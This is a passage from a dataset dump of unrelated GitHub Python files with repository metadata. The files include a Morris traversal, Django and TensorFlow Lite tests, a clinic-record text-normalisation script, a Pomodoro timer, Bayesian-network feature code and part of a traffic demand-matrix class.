font=(\"Arial\", 12), justify=tk.LEFT)\nstartPairLabel.grid(row=0, column=0)\nstartPairVariable = tk.StringVar()\nstartPairVariable.set(STARTING_PAIRS_TUPLE[0])\nstartPairDropdown = tk.OptionMenu(startPairFrame, startPairVariable, *STARTING_PAIRS_TUPLE)\nstartPairDropdown.grid(row=0, column=1)\n\n#add the run button\nrunButton = tk.Button(window, text=\"Run\", font=(\"Arial\", 12), command=searchPairs)\nrunButton.grid(row=5, column=0)\n\n#start the gui\nwindow.mainloop()\n","repo_name":"albong/pairsearch","sub_path":"pairsearch.py","file_name":"pairsearch.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4418667110","text":"\nclass Node:\n\n # Constructor to create a new node\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef MorrisTraversal(root):\n # Set current to root of binary tree\n current = root\n\n while (current is not None):\n\n if current.left is None:\n print(current.data)\n current = current.right\n else:\n pre = current.left\n while (pre.right is not None and pre.right != current):\n pre = pre.right\n\n # Make current as right child of its inorder predecessor\n if (pre.right is None):\n pre.right = current\n current = current.left\n\n # Revert the changes made in if part to restore the original tree\n # fix the right child of predecssor\n else:\n pre.right = None\n print(current.data)\n current = current.right\n\n\n\"\"\" \nConstructed binary tree is\n 1\n / \\\n 2 3\n / \\\n 4 5\n\"\"\"\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\n\nMorrisTraversal(root)","repo_name":"Taoge123/LeetCode","sub_path":"Binary Tree/InorderWIthoutRecursionAndStack.py","file_name":"InorderWIthoutRecursionAndStack.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39649750445","text":"from accounts.models import User\n\nfrom django.test import TestCase\n\nfrom post.forms import CreatePostForm, UpdatePostForm\nfrom post.models import Posts\n\n\nclass TestForms(TestCase):\n username = None\n posts = None\n\n @classmethod\n def setUpTestData(cls):\n cls.username = 'user_1'\n User.objects.create_user(\n username=cls.username,\n password='12345Qwerty',\n email='test1@gmail.com',\n is_activated=True\n )\n\n cls.posts = 'test_post'\n Posts.objects.create(\n title=cls.posts,\n author=User.objects.get(username=cls.username),\n text='abc123'\n )\n\n def setUp(self):\n self.post = Posts.objects.get(author__username=self.username)\n\n def test_create_update_post_form(self):\n form = CreatePostForm(\n data={\n 'title': self.post.title,\n 'text': self.post.text\n }\n )\n form_update = UpdatePostForm(\n data={\n 'title': self.post.title,\n 'text': self.post.text\n }\n )\n\n self.assertEqual(form.is_valid(), form_update.is_valid(), True)\n\n def test_create_post_no_data(self):\n form = CreatePostForm(data={})\n\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 2)\n","repo_name":"KulykDima/Django_blog","sub_path":"src/post/test/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"74517380534","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\n\nfrom tensorflow.python import keras\nfrom tensorflow.python import tf2\nfrom tensorflow.python.client import session\nfrom tensorflow.python.eager import def_function\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.platform import resource_loader\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.saved_model import saved_model\nfrom tensorflow.python.saved_model.save import save\nfrom tensorflow.python.training.tracking import tracking\nfrom tensorflow.python.training.training_util import write_graph\n\n\nclass TestModels(test_util.TensorFlowTestCase):\n\n def _getFilepath(self, filename):\n return os.path.join(self.get_temp_dir(), filename)\n\n def _run(self, flags_str, should_succeed):\n output_file = os.path.join(self.get_temp_dir(), 'model.tflite')\n tflite_bin = resource_loader.get_path_to_datafile('tflite_convert')\n cmdline = '{0} --output_file={1} {2}'.format(tflite_bin, output_file,\n flags_str)\n\n exitcode = os.system(cmdline)\n if exitcode == 0:\n with gfile.Open(output_file, 'rb') as model_file:\n content = model_file.read()\n self.assertEqual(content is not None, should_succeed)\n os.remove(output_file)\n else:\n self.assertFalse(should_succeed)\n\n def _getKerasModelFile(self):\n x = np.array([[1.], [2.]])\n y = np.array([[2.], [4.]])\n\n model = keras.models.Sequential([\n keras.layers.Dropout(0.2, input_shape=(1,)),\n keras.layers.Dense(1),\n ])\n model.compile(optimizer='sgd', loss='mean_squared_error')\n model.fit(x, y, epochs=1)\n\n keras_file = self._getFilepath('model.h5')\n keras.models.save_model(model, keras_file)\n return keras_file\n\n\nclass TfLiteConvertV1Test(TestModels):\n\n def _run(self, flags_str, should_succeed):\n if tf2.enabled():\n flags_str += ' --enable_v1_converter'\n super(TfLiteConvertV1Test, self)._run(flags_str, should_succeed)\n\n def testFrozenGraphDef(self):\n with ops.Graph().as_default():\n in_tensor = array_ops.placeholder(\n shape=[1, 16, 16, 3], dtype=dtypes.float32)\n _ = in_tensor + in_tensor\n sess = session.Session()\n\n # Write graph to file.\n graph_def_file = self._getFilepath('model.pb')\n write_graph(sess.graph_def, '', graph_def_file, False)\n sess.close()\n\n flags_str = ('--graph_def_file={0} --input_arrays={1} '\n '--output_arrays={2}'.format(graph_def_file,\n 'Placeholder', 'add'))\n self._run(flags_str, should_succeed=True)\n os.remove(graph_def_file)\n\n def testSavedModel(self):\n saved_model_dir = self._getFilepath('model')\n with ops.Graph().as_default():\n with session.Session() as sess:\n in_tensor = array_ops.placeholder(\n shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')\n out_tensor = in_tensor + in_tensor\n inputs = {'x': in_tensor}\n outputs = {'z': out_tensor}\n saved_model.simple_save(sess, saved_model_dir, inputs, outputs)\n\n flags_str = '--saved_model_dir={}'.format(saved_model_dir)\n self._run(flags_str, should_succeed=True)\n\n def testKerasFile(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = '--keras_model_file={}'.format(keras_file)\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n def testKerasFileMLIR(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = ('--keras_model_file={} --experimental_new_converter'\n .format(keras_file))\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n\nclass TfLiteConvertV2Test(TestModels):\n\n @test_util.run_v2_only\n def testSavedModel(self):\n input_data = constant_op.constant(1., shape=[1])\n root = tracking.AutoTrackable()\n root.f = def_function.function(lambda x: 2. * x)\n to_save = root.f.get_concrete_function(input_data)\n\n saved_model_dir = self._getFilepath('model')\n save(root, saved_model_dir, to_save)\n\n flags_str = '--saved_model_dir={}'.format(saved_model_dir)\n self._run(flags_str, should_succeed=True)\n\n @test_util.run_v2_only\n def testKerasFile(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = '--keras_model_file={}'.format(keras_file)\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n @test_util.run_v2_only\n def testKerasFileMLIR(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = ('--keras_model_file={} --experimental_new_converter'\n .format(keras_file))\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n def testMissingRequired(self):\n self._run('--invalid_args', should_succeed=False)\n\n def testMutuallyExclusive(self):\n self._run(\n '--keras_model_file=model.h5 --saved_model_dir=/tmp/',\n should_succeed=False)\n\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"algorithmdog/tensorflow-cplusplus-learn","sub_path":"tensorflow/lite/python/tflite_convert_test.py","file_name":"tflite_convert_test.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"26807929682","text":"list1 = \"my name is saurabh and i am still a noodler in programming\"\n\nlist1 = list1.split(\" \")\n#print(list1)\n\n\nprint(\"wait there are few more stuffs\")\nlist2 = \"saurabh has high temper problem as well\"\nlist2 =list2.split(\" \")\n\nlist4 =[]\n\n#print (list2)\n\n\n#def contatination():\n#\tlist3 = list1 + list2\n#\tprint(list3)\n\n\ndef func(num):\n\n\tfor i in range(0,num):\n\t\tack = list2.pop()\n\t\tlist4.append(ack)\n\n\tprint(list4)\n\n\n# contatination()\nnum = int(input(\"enter how many number your would like to add to the list\"))\nfunc(num)\n\n\n\n","repo_name":"saurabhban/beginner","sub_path":"codes/ex38.py","file_name":"ex38.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5741732769","text":"import http.client\nimport os\nimport json\nimport re\nimport sys\n\n\ndef clean_from_comments(content):\n return re.sub(\"(\\/\\*{1,}[^\\/]{0,}\\*{1,}\\/)\", \"\", content)\n\n\ndef main():\n EXTERNALS_PATH = \"./externals.jsonc\"\n\n if os.path.isfile(EXTERNALS_PATH):\n with open(EXTERNALS_PATH, \"r\") as file:\n content = clean_from_comments(file.read())\n externals = json.loads(content)\n\n name = sys.argv[1]\n\n connection = http.client.HTTPConnection(\"94.250.250.29\", 5050)\n\n headers = {\n \"Content-Type\": \"application/json\",\n }\n payload = {\"name\": name, \"externals\": externals, \"env\": \"prod\"}\n payload_json = json.dumps(payload)\n\n print(f\"payload_json {payload_json}\")\n\n connection.request(\n \"POST\", \"/update-externals\", body=payload_json, headers=headers\n )\n res = connection.getresponse()\n\n if res.status == 200:\n print(\n f\"External dependencies of microfrontend {name} were successfully updated\"\n )\n exit(0)\n else:\n print(f\"Error occurred! {res.read().decode('utf-8')}\")\n exit(1)\n else:\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"microfrontends-diploma/navigation-mf","sub_path":".github/scripts/ext-libraries.py","file_name":"ext-libraries.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9752111281","text":"\"\"\" 解析前に持っていたデータを作業前クレンジングするための処理ファイル\n[前提]\n- カルテデータはexcelで送付されました(=SJIS)\n[ゴール]\n- UT8\n- TSV\n- 改行コード LF\n- ヘッダーなし\n- インデックスなし\n\"\"\"\nfrom __future__ import unicode_literals\nimport re\nimport unicodedata\nfrom pathlib import Path\nimport pandas as pd\n\n\ndef unicode_normalize(cls, s):\n \"\"\"Neologd プレ処理\"\"\"\n pt = re.compile('([{}]+)'.format(cls))\n\n def norm(c):\n return unicodedata.normalize('NFKC', c) if pt.match(c) else c\n\n s = ''.join(norm(x) for x in re.split(pt, s))\n s = re.sub('-', '-', s)\n return s\n\n\ndef remove_extra_spaces(s):\n \"\"\"Neologd プレ処理\"\"\"\n s = re.sub('[  ]+', ' ', s)\n blocks = ''.join(('\\u4E00-\\u9FFF', # CJK UNIFIED IDEOGRAPHS\n '\\u3040-\\u309F', # HIRAGANA\n '\\u30A0-\\u30FF', # KATAKANA\n '\\u3000-\\u303F', # CJK SYMBOLS AND PUNCTUATION\n '\\uFF00-\\uFFEF' # HALFWIDTH AND FULLWIDTH FORMS\n ))\n basic_latin = '\\u0000-\\u007F'\n\n def remove_space_between(cls1, cls2, s):\n \"\"\"Neologd プレ処理\"\"\"\n p = re.compile('([{}]) ([{}])'.format(cls1, cls2))\n while p.search(s):\n s = p.sub(r'\\1\\2', s)\n return s\n\n s = remove_space_between(blocks, blocks, s)\n s = remove_space_between(blocks, basic_latin, s)\n s = remove_space_between(basic_latin, blocks, s)\n return s\n\n\ndef normalize_neologd(s):\n \"\"\"Neologd プレ処理\"\"\"\n s = s.strip()\n s = unicode_normalize('0-9A-Za-z。-゚', s)\n\n def maketrans(f, t):\n return {ord(x): ord(y) for x, y in zip(f, t)}\n\n s = re.sub('[˗֊‐‑‒–⁃⁻₋−]+', '-', s) # normalize hyphens\n s = re.sub('[﹣-ー—―─━ー]+', 'ー', s) # normalize choonpus\n s = re.sub('[~∼∾〜〰~]', '', s) # remove tildes\n s = s.translate(\n maketrans('!\"#$%&\\'()*+,-./:;<=>?@[¥]^_`{|}~。、・「」',\n '!”#$%&’()*+,-./:;<=>?@[¥]^_`{|}〜。、・「」'))\n\n s = remove_extra_spaces(s)\n s = unicode_normalize('!”#$%&’()*+,-./:;<>?@[¥]^_`{|}〜', s) # keep =,・,「,」\n s = re.sub('[’]', '\\'', s)\n s = re.sub('[”]', '\"', s)\n return s\n\n\n# 作業前ファイル\nsource_file = Path.cwd().joinpath('202001.xlsx')\n# 吐き出しファイル\nresult_file = Path.cwd().joinpath('cleansing-completed.tsv')\n\n# Excelファイルの読み込み\ndf = pd.read_excel(source_file, engine='openpyxl')\n# 改行コードの修正\nchange_indention = df.replace('_x000D_', '', regex=True)\n\n# neologd 前処理\nwith open(result_file, mode='w', encoding='utf8') as f:\n for column_name, row in change_indention.iterrows():\n if row['タイトル'] == '診療録':\n # 診療録のみを抽出し、内容カラムにneologd前処理をかける\n exclude_space = remove_extra_spaces(row['内容'])\n normalize_detail = normalize_neologd(exclude_space)\n\n # TSV書き込み\n write_data = [row['患者番号'], str(row['登録日時']), row['タイトル'], '\"' + normalize_detail + '\"']\n f.writelines('\\t'.join(write_data) + '\\n')\n\n else:\n print(row['タイトル'] + ' skip')\n","repo_name":"mahya8585/Karte-Analisys","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34808149058","text":"from tkinter import *\nimport math\n\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\nis_timer_running = False\n#RESETTING TIMER MECHANISM\n\ndef reset_timer():\n global reps\n global is_timer_running\n if is_timer_running:\n window.after_cancel(timer)\n canvas.itemconfig(timer_text, text= \"00:00\")\n title_label.config(text = \"IDLE TIMER\")\n check_marks.config(text = \"\")\n reps = 0\n is_timer_running = False\n start_button.config(state=NORMAL)\n reset_button.config(state=DISABLED)\n\n#STARTING TIMER MECHANIZM\n\ndef start_timer():\n global reps\n global is_timer_running\n is_timer_running = False\n if not is_timer_running:\n reps+=1\n work_sec = WORK_MIN * 60\n short_break_sec = SHORT_BREAK_MIN * 60\n long_break_sec = LONG_BREAK_MIN * 60\n\n if reps % 8 == 0:\n count_down(long_break_sec)\n title_label.config(text=\"LONG-BREAK\")\n elif reps % 2 == 0:\n count_down(short_break_sec)\n title_label.config(text=\"SHORT-BREAK\")\n else:\n count_down(work_sec)\n title_label.config(text=\"WORK-SESSION\")\n is_timer_running = True\n start_button.config(state=DISABLED)\n reset_button.config(state=NORMAL)\n\n#COUNT DOWN MECHANISM\ndef count_down(count):\n\n count_min = math.floor(count/60)\n count_sec = count%60\n if count_sec<10:\n count_sec =f\"0{count_sec}\"\n if count>=0:\n global timer\n canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n timer = window.after(1000, count_down, count - 1)\n else:\n start_timer()\n mark =\"\"\n for _ in range(math.floor(reps/2)):\n mark+=\"✔️\"\n check_marks.config(text = mark)\n\n#UI SETUP\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx = 100, pady=50, bg=YELLOW)\ncanvas = Canvas(width=200, height=224, background=YELLOW, highlightthickness=0)\n\n\ntitle_label = Label(text=\"IDLE TIMER\",font=(FONT_NAME, 40, \"bold\"), fg=GREEN, bg=YELLOW)\ntitle_label.grid(column=1, row=0)\n\n\nstart_button = Button(text= \"Start\", command =start_timer)\nstart_button.grid(column=0, row=2)\n\nreset_button = Button(text=\"Reset\",command=reset_timer, state=DISABLED)\nreset_button.grid(column=2, row=2)\n\ntomato_img = PhotoImage(file = \"tomato.png\")\ncanvas.create_image(100, 112, image=tomato_img)\ntimer_text = canvas.create_text(103,130, text=\"00:00\", fill=\"white\", font=(FONT_NAME,35, \"bold\"))\ncanvas.grid(column=1, row=1)\n\ncheck_marks = Label(fg = GREEN, bg = YELLOW, font=(FONT_NAME, 18, \"bold\"))\ncheck_marks.grid(column=1, row=2)\n\nwindow.mainloop()\n","repo_name":"Aizad-eng/pomodoro-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74798456428","text":"# BN edge formation을 위해 Pairwise Similarity를 결정하기 위한 feature 값을 정해 주는 모듈이 아닌,\n# tabula_non_rasa에서 tentative rule을 적용하기 위한 feature 값을 정해 주는 모듈.\n# 하나의 그래프에 대해서만 dataframe을 그린다.\n\nimport json\nimport pandas as pd\nimport networkx as nx\nimport re\nimport os\n\nfrom create_node import process\nfrom java_builtins import builtin_collections, builtin_types\n\ndef retrieve_path():\n \"\"\"paths.json을 읽고 path를 가져온다.\"\"\"\n with open(\"paths.json\", \"r+\") as pathjson:\n pathdict = json.load(pathjson)\n return pathdict[\"project_root_directory\"]\n\n\n# Constants ================================\n# ==========================================\n\nPROJECT_ROOT_DIR = retrieve_path()\n\nwith open(os.path.join(PROJECT_ROOT_DIR, \"GetterSetter.json\"), \"r+\") as f:\n GETTER_SETTER = json.load(f)\n\n\nwith open(os.path.join(PROJECT_ROOT_DIR, \"Annotations.json\"), \"r+\") as f:\n ANNOTATIONS = json.load(f)\n\n\nbuiltin_type_classes = list(filter(lambda x:\\\n '[' not in x and\n ']' not in x, builtin_types))\nwrapped_primitives = list(map(lambda string: string[0].upper() + string[1:], builtin_type_classes))\n\n\n# feature value setters ========================\n# ==============================================\n\n\ndef getter_setter_mapfunc(row):\n try:\n return GETTER_SETTER[row[\"name\"]]\n except:\n return \"nothing\"\n\n\ndef set_getter_setter(df):\n \"\"\"getter_setter 칼럼의 값을 ['getter'|'setter'|'nothing']으로 초기화\"\"\"\n getter_setter_val_df = df.apply(getter_setter_mapfunc, axis=1)\n df[\"getter_setter\"] = getter_setter_val_df\n return df\n\n\n# https://stackoverflow.com/questions/29916065/how-to-do-camelcase-split-in-python\ndef camel_case_split(identifier):\n matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', identifier)\n return [m.group(0) for m in matches]\n\n\ndef is_hashCode_mapfunc(row):\n if \"hashCode\" == process(row['name'])[2]:\n return True\n else:\n return False\n\n\ndef is_assert_mapfunc(row):\n if \"assert\" in camel_case_split(row[\"name\"]): \n return True\n else:\n return False\n\n\ndef set_is_hashCode(df):\n \"\"\"is_hashCode 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_hashCode_val_df = df.apply(is_hashCode_mapfunc, axis=1)\n df[\"is_hashCode\"] = is_hashCode_val_df\n return df\n\n\ndef set_is_assert(df):\n \"\"\"is_assert 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_assert_val_df = df.apply(is_assert_mapfunc, axis=1)\n df[\"is_assert\"] = is_assert_val_df\n return df\n\n\ndef is_to_mapfunc(row):\n if camel_case_split(row[\"name\"])[0] == \"to\": \n return True\n else:\n return False\n\n\ndef set_is_to(df):\n \"\"\"is_to 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_to_val_df = df.apply(is_assert_mapfunc, axis=1)\n df[\"is_to\"] = is_to_val_df\n return df\n\n\ndef is_wrapping_primitive_mapfunc(row):\n classname = process(row['name'])[0]\n if classname in wrapped_primitives:\n return True\n else:\n return False\n\n\ndef set_is_wrapping_primitive(df):\n \"\"\"is_wrapping_primitive 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_wrapping_primitive_val_df = df.apply(is_wrapping_primitive_mapfunc, axis=1)\n df[\"is_wrapping_primitive\"] = is_wrapping_primitive_val_df\n return df\n\n\ndef is_builtin_coll_mapfunc(row):\n classname = process(row['name'])[0]\n if classname in builtin_collections:\n return True\n else:\n return False\n\n\ndef set_is_builtin_coll(df):\n \"\"\"is_builtin_coll 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_builtin_coll_df = df.apply(is_builtin_coll_mapfunc, axis=1)\n df[\"is_builtin_coll\"] = is_builtin_coll_df\n return df\n\n\ndef is_GET_POST_SELECT_mapfunc(row):\n annot = ANNOTATIONS[row[\"name\"]]\n if \"GET\" in annot:\n return \"GET\"\n elif \"POST\" in annot:\n return \"POST\"\n elif \"SELECT\" in annot:\n return \"SELECT\"\n else:\n return \"nothing\"\n\n\ndef set_is_GET_POST_SELECT(df):\n \"\"\"is_GET_POST_SELECT 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_GET_POST_SELECT = df.apply(is_builtin_coll_mapfunc, axis=1)\n df[\"is_GET_POST_SELECT\"] = is_GET_POST_SELECT\n return df\n\n\n# main =================================\n# ======================================\n\ndef main(graph_nodes):\n \"\"\"주어진 그래프에 대한 DataFrame을 초기화한다.\"\"\"\n # \"name\" columns부터 만든다.\n df = pd.DataFrame(list(graph_nodes), columns=['name'])\n\n # \"getter_setter\" column을 만든다.\n df = set_getter_setter(df)\n\n # \"is_hashCode\" column을 만든다.\n df = set_is_hashCode(df)\n\n # \"is_assert\" column을 만든다.\n df = set_is_assert(df)\n\n # \"is_to\" column을 만든다.\n df = set_is_to(df)\n\n # \"is_wrapping_primitive\" column을 만든다.\n df = set_is_wrapping_primitive(df)\n\n # \"is_builtin_coll\" column을 만든다.\n df = set_is_builtin_coll(df)\n\n # \"is_GET_POST_SELECT\" column을 만든다.\n df = set_is_GET_POST_SELECT(df)\n\n return df\n","repo_name":"jeongsoolee09/Taint-Analysis","sub_path":"Code/BayesianNetwork/extra_features.py","file_name":"extra_features.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19240965730","text":"from django.core.management import BaseCommand, call_command\nfrom OMDApp.models import Veterinario, Turno\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Permission\nfrom django.db.models import Q\nfrom datetime import date\n# from yourapp.models import User # if you have a custom user\n\n\nclass Command(BaseCommand):\n help = \"DEV COMMAND: Fill databasse with a set of data for testing purposes\"\n\n def handle(self, *args, **options):\n call_command('loaddata', 'vet.json')\n # Set vet permissions\n vet_perm = Permission.objects.get(codename='is_vet')\n for vet in Veterinario.objects.all():\n vet.user.user_permissions.add(vet_perm)\n # Fix the passwords of fixtures and set client permissions\n client_perm = Permission.objects.get(codename='is_client')\n for user in get_user_model().objects.all():\n if user.email.startswith(\"user\"):\n user.user_permissions.add(client_perm)\n user.set_password(user.password)\n user.save()\n \n for turn in Turno.objects.all().exclude(motive=\"Demo\"):\n turn.date = date.today()\n turn.save()\n\n for turn in Turno.objects.filter(state='F'):\n turn.add_to_clinic_history()\n turn.add_to_health_book()","repo_name":"cd-paliv/IS2","sub_path":"src/OMD/OMDApp/management/commands/initdata.py","file_name":"initdata.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1293659544","text":"__copyright__ = \"Copyright 2011-2012 SFCTA\"\n__license__ = \"\"\"\n This file is part of DTA.\n\n DTA is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n DTA is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with DTA. If not, see .\n\"\"\"\nimport pdb\nimport copy\nimport csv\nimport datetime\nfrom itertools import izip \n\nimport numpy as np\n\nimport dta\nfrom dta.Algorithms import hasPath, getClosestCentroid \nfrom dta.DtaError import DtaError\nfrom dta.MultiArray import MultiArray\nfrom dta.Utils import Time\n\nclass Demand(object):\n \"\"\"\n Class that represents the demand matrix for a :py:class:`Network`\n \"\"\"\n\n @classmethod\n def readCubeODTable(cls, fileName, net, vehicleClassName, \n startTime, endTime, timeStep, demandPortion):\n \"\"\"\n Reads the demand (linear format) from the input csv file and returns a demand instance.\n \n :param fileName: the file containing the demand; this will be a CSV containing \n ``Origin, Destination, VehicleClassDemand1, VehicleClassDemand2, ...``. The header line will be used\n to determine which column is relevant to which Vehicle Class.\n :param net: the Network for which this demand is relevant, used to get TAZ numbers.\n :type net: a :py:class:`Network` instance\n :param vehClassName: a string that must match the relevant :py:class:`VehicleClass` exactly (it's case-sensitive!)\n :param startTime: the simulation start time for when this demand will get added to the network.\n :type startTime: a :py:class:`dta.Utils.Time` instance\n :param endTime: the simulation end time for this demand will stop being added to the network.\n :type endTime: a :py:class:`dta.Utils.Time` instance\n :param timeStep: the granularity of time steps at which the demand is represented.\n :type timeStep: a :py:class:`dta.Utils.Time` instance\n \n \"\"\"\n timeSpan = endTime - startTime\n demand = Demand(net, vehicleClassName, startTime, endTime, timeStep)\n #demand = Demand(net, vehicleClassName, startTime, endTime, timeSpan)\n totTrips = 0\n numIntrazonalTrips = 0\n inputStream = open(fileName, \"r\")\n checkSum = 0 \n \n for record in csv.DictReader(inputStream):\n \n origin = int(record[\"O\"])\n destination = int(record[\"D\"])\n trips = demandPortion*float(record[vehicleClassName])\n totTrips += trips\n tripsInHourlyFlows = trips * (60.0 / timeSpan.getMinutes())\n \n if tripsInHourlyFlows == 0:\n continue\n if origin == destination:\n origCent = net.getNodeForId(origin)\n destCent, dist = getClosestCentroid(net, origCent)\n tripsIntrazonal = tripsInHourlyFlows/2\n tripsBefore = demand.getTotalNumTrips()\n for i,timeSlice in enumerate(demand._timePeriods):\n tripsOD = demand.getValue(timeSlice, origCent.getId(), destCent.getId())\n tripsDO = demand.getValue(timeSlice, destCent.getId(), origCent.getId())\n tripsOD += tripsIntrazonal\n tripsDO += tripsIntrazonal\n demand.setValue(timeSlice, origCent.getId(), destCent.getId(), tripsOD)\n demand.setValue(timeSlice, destCent.getId(), origCent.getId(), tripsDO)\n #dist = dist/5280\n #dta.DtaLogger.debug(\"Assigning %f intrazonal trips from zone %s to zone %s, %8.4f miles away.\" % (tripsInHourlyFlows,origCent.getId(),destCent.getId(),dist))\n numIntrazonalTrips += trips\n continue\n if not net.hasCentroidForId(origin):\n dta.DtaLogger.error(\"Origin zone %d does not exist\" % origin)\n continue \n if not net.hasCentroidForId(destination):\n dta.DtaLogger.error(\"Destination zone %s does not exist\" % destination)\n continue\n for i,timeSlice in enumerate(demand._timePeriods):\n tripsOD = demand.getValue(timeSlice, origin, destination)\n tripsOD += tripsInHourlyFlows\n demand.setValue(timeSlice, origin, destination, tripsOD)\n #if destination == 7973:\n # checkSum += trips\n\n dta.DtaLogger.info(\"The cube table has the following fields: %s\" % \",\".join(record.keys()))\n \n dta.DtaLogger.info(\"Read %10.2f %-16s from %s\" % (totTrips, \"%s TRIPS\" % vehicleClassName, fileName))\n if numIntrazonalTrips > 0:\n dta.DtaLogger.info(\"Reassigned %f intrazonal Trips\" % numIntrazonalTrips)\n if totTrips - demand.getTotalNumTrips() > 1:\n dta.DtaLogger.error(\"The total number of trips in the Cube table = %d not equal to the number of trips transfered to Dynameq = %d.\" % (totTrips,demand.getTotalNumTrips()))\n #dta.DtaLogger.info(\"There are %10.2f trips to zone 7973\" % checkSum)\n \n return demand\n \n @classmethod\n def readDynameqTable(cls, net, fileName):\n \"\"\"\n Read the dynameq demand stored in the *fileName* that pertains to *net*, a :py:class:`Network` instance.\n This method reads only rectangular demand tables. \n \"\"\"\n DYNAMEQ_FORMAT_FULL = \"FORMAT:full\" \n \n input = open(fileName, \"rb\")\n \n input.next() # \n input.next() # \n input.next() # \n input.next() # * comment \n line = input.next().strip() \n if line != DYNAMEQ_FORMAT_FULL:\n raise DtaError(\"I cannot read a demand format other than %s\" % Demand.FORMAT_FULL)\n input.next() # VEH_CLASS \n line = input.next().strip() \n\n vehClassName = line\n input.next() #DATA \n line = input.next().strip() \n\n startTime = Time.readFromString(line)\n line = input.next().strip()\n endTime = Time.readFromString(line) \n \n line = input.next().strip() #SLICE \n assert line == \"SLICE\" \n line = input.next().strip() # first time slice\n \n timeSlice1 = Time.readFromString(line)\n\n timeStep = timeSlice1 - startTime \n if timeStep.getMinutes() == 0:\n raise DtaError(\"The time step defined by the first slice cannot be zero\") \n \n demand = Demand(net, vehClassName, startTime, endTime, timeStep)\n _npyArray = demand._demandTable.getNumpyArray()\n\n timeStepInMin = timeStep.getMinutes()\n\n for i, timePeriod in enumerate(demand.iterTimePeriods()):\n if timePeriod != demand.startTime + demand.timeStep: \n line = input.next().strip()\n assert line == \"SLICE\"\n line = input.next().strip() \n destinations = map(int, input.next().strip().split())\n for j, origin in enumerate(range(net.getNumCentroids())):\n fields = map(float, input.next().strip().split()) \n #_npyArray[i,j,:] = np.array(fields[1:]) / ( 60.0 / timeStepInMin)\n _npyArray[i,j,:] = np.array(fields[1:])\n \n return demand\n\n\n\n def __init__(self, net, vehClassName, startTime, endTime, timeStep):\n \"\"\"\n Constructor that initializes an empty Demand table that has three dimensions:\n time, origin taz, destination taz. \n \n :param net: the Network for which this demand is relevant, used to get TAZ numbers.\n :type net: a :py:class:`Network` instance\n :param vehClassName: a string that must match the relevant :py:class:`VehicleClass` exactly (it's case-sensitive!)\n :param startTime: the simulation start time for when this demand will get added to the network.\n :type startTime: a :py:class:`dta.Utils.Time` instance\n :param endTime: the simulation end time for this demand will stop being added to the network.\n :type 